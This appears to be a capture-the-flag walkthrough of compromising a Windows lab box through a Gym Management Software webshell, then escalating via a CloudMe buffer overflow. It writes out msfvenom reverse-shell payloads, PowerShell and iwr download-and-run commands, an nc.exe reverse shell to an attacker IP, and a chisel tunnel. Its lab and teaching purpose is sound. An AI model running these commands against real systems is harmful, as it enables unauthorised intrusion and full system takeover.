Start
IP: 10.129.2.18
Enumeration
As always, let's start with a nmap scan to see what we have.
eric@blog:~$ nmap -sSV -p- -oA 1_init_nmap 10.129.2.18
Starting Nmap 7.95 ( https://nmap.org ) at 2026-06-05 16:05 EDT
Nmap scan report for 10.129.2.18
Host is up (0.048s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
7680/tcp open pando-pub?
8080/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 249.52 seconds
Two ports revealed, a 7680 where the service was not confidently fingerprinted, and 8080 for Apache on Windows.
8080 - Apache
Taking a glance at the website, we visually see "mrb3n's Bro Hut", what appears to be some sort of fitness site? Right clicking to view the source, I see a layout of where some of the css / js lives in /boot. Attempting to access this directory directly throws a 403 forbidden. No directory browsing enabled. On the contact page, we see "Made using Gym Management Software 1.0".
A simple searchsploit "Gym Management" reveals multiple vulnerabilities, including SQL injection, Auth Bypass, XSS, and Unauthenticated RCE. Unauthenticated RCE sounds great, sign me up.
Exploitation
Reviewing the code for /usr/share/exploitdb/exploits/php/webapps/48506.py, this exploit allows access to the upload.php file, uploads a php webshell as a fake png, and then allows you to interact at /upload.php?id=kamehameha. Unfortunately, this file was written in python 2.7, so we need to make some slight modifications to get it to work in python3.
cp /usr/share/exploitdb/exploits/php/webapps/48506.py ./48506.py. Then the following changes need made on line 48, 81, 83, 84: change print syntax to print(). Once finished, let's run.
eric@blog:~$ python3 48506.py http://10.129.2.18:8080/
SIG += BL+' \/'+RS+'\n'
/\
/vvvvvvvvvvvv \--------------------------------------,
`^^^^^^^^^^^^ /============BOKU====================="
\/
[+] Successfully connected to webshell.
Exiting.
With the webshell active, we can visit http://10.129.2.18:8080/upload/kamehameha.php?telepathy=whoami and it returns buff\shaun.
Post-Exploitation
Enumeration
We are in a command shell on windows so our commands need to be towards that. dir returns Volume in drive C has no label. Volume Serial Number is A22D-49F7 Directory of C:\xampp\htdocs\gym\upload 06/06/2026 02:40. I can easily navigate to the home directory dir C:\users\shaun\, poking around here, we find user.txt in Desktop, which we can reveal the contents with type.
Shell Upgrade
The current PHP script is great but we need better. Using msfvenom, we can generate a simple payload. msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f ps1 > shell.ps1.
We can then start a web server on our attackbox to serve the payload via python3 -m http.server. Using the webshell, I tried several variants including certutil and curl which neither worked. The one that finally worked was ?telepathy=powershell -Command "Invoke-WebRequest -Uri 'http://10.10.10.10:8000/test.ps1' -OutFile 'C:\users\shaun\downloads\test.ps1'" which grabbed the file. Then a second ?telepathy=powershell -ExecutionPolicy Bypass -File C:\users\shaun\downloads\test.ps1 to execute.
Finally, a shell pops on my listener. Poking around, running some of the other shell commands reveals the antivirus is enabled and blocking. Unfortunately though, we're still in a dumb shell, although it was better than the php only shell. Let's try again. On our attacking machine windows-binaries reveals nc.exe, so we can spawn our remote server python -m http.server again and fetch this file.
# victim
iwr -URI 'http://10.10.10.10:8000/nc.exe' -OutFile 'C:\users\shaun\downloads\nc.exe'
# attacker
nc -lvnp 4440
# victim
cd C:\users\shaun\downloads
.\nc.exe 10.10.10.10 4440 -e powershell
Finally a better shell!
More Enumeration
In C:\xampp, a passwords.txt exists with default passwords. Attempting other commands such as wmic logicaldisk get name, fsutil fsinfo drives or net use throw the same malicious content, blocked by AV error.
A tasks.bat exists under Shaun's Documents folder, with the line START C:/xampp/xampp_start.exe Under downloads, "CloudMe_1112.exe" exists. Using tasklist /SVC, CloudMe.exe is running under PID 4328.
Using searchsploit, we discover this version is susceptible to a buffer overflow that can allow remote code execution, CVE-2020-37070. The exploit leverages the running port 8888. netstat -ano | findstr 8888 confirms this port is active, but only locally and not exposed to our attacker machine.
Priv-Esc // Exploitation
First, let's start with the exploit code, cp /usr/share/exploitdb/exploits/windows/local/48499.txt 48499.py. Following the instructions, we generate the msfvenom payload using msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 EXITFUNC=thread -b "\x00\x0d\x0a" -f python for our listener and paste it into the script. We now have our final python payload.
The next hurdle is that all of the public exploit code is written in python or ruby, which is not available locally on the victim machine. I rattled my brain here a bit on what to do next. I have done SSH reverse tunnels before, but we don't have credentials for that. Alternatively, we could try to convert the python to another language (difficult) or package python with it somehow.
I checked ssh but unfortunately no ssh available. I searched on google "how to tunnel traffic from windows to linux without ssh" and one of the first links is to here, explaining a tool named chisel. It appears this used to be bundled with kali at some point but no longer appears to be.
sudo apt update followed by sudo apt install chisel gets us the kali version v1.11.6. I downloaded the latest v1.11.5 version from GitHub here. Copied it over to /usr/share/windows-resources/binaries for any future use.
Per the superuser link above, here's how we can tunnel:
# on attacker, in dir where chisel.exe is located
python -m http.server
# on victim
iwr -URI 'http://10.10.10.10:8000/chisel_1.11.5_amd64.exe' -OutFile 'C:\users\shaun\downloads\chisel.exe'
# on attacker
chisel server --reverse --port 9001
# on victim
.\chisel.exe client 10.10.10.10:9001 R:8888:127.0.0.1:8888
Our tunnel shows connected. Spawn another tab on our attacker box to listen nc -lvnp 4443, and let's execute the payload python3 48499.py. We get an error that we cannot concat str to bytes. Let's fix the script by adding b before the junk1, nops, junk2 strings. While the payload executes, the reverse shell doesn't light up.
Let's try a PoC that doesn't have the SEH, DEP, ASLR protections built in, 48389. I copied over the payload and had to make a number of changes:
- swap payload and buf variables as our msfvenom generated payload used buf.
- change the exectption to print(e)
Executing the payload python3 48389.py lights up the listener in C:\Windows\system32. whoami reveals we are buff\administrator
Admin
root.txt found under C:\users\administrator\desktop\root.txt to accomplish the box
Lessons Learned
The initial access was fairly straight forward thanks to version information found on the website, and a quick searchsploit to find vulnerabilities. Upgrading from the php shell to a more stable shell was a bit more of a challenge. In the end, even using nc.exe did not feel incredibly stable. While attempting to use chisel for the first time, I made a couple of errors which CTRL+C ended up killing my shell and requiring me to re-exploit. I had 3 windows shells by the end, I could've skipped the msfvenom ps1 altogether and just went straight to nc.exe in the future.
The AV on the machine was hit or miss on what it decided to block. It was initially blocking some of my original payloads, without returning output to the php shell, making it difficult to troubleshoot. I also initially tried to target port 9001 for the exploit, not realizing the actual 8888 was also forwarded over. Instead of needing to heavily modify variable names in the actual exploit code, I could've used -v payload to just rename the output to a different name.
This article explains how to actually craft the buffer overflow code yourself using Immunity Debugger and mona.py. It starts with a basic payload, sending thousands of 'A's to determine if anything happens. After several increases, the SEH was overwritten which causes the application to crash. mona.py can then be used to print a unique rotation of letters instead of just As to identify the exact offsets to use and in finding a pop pop ret to redirect to the payload.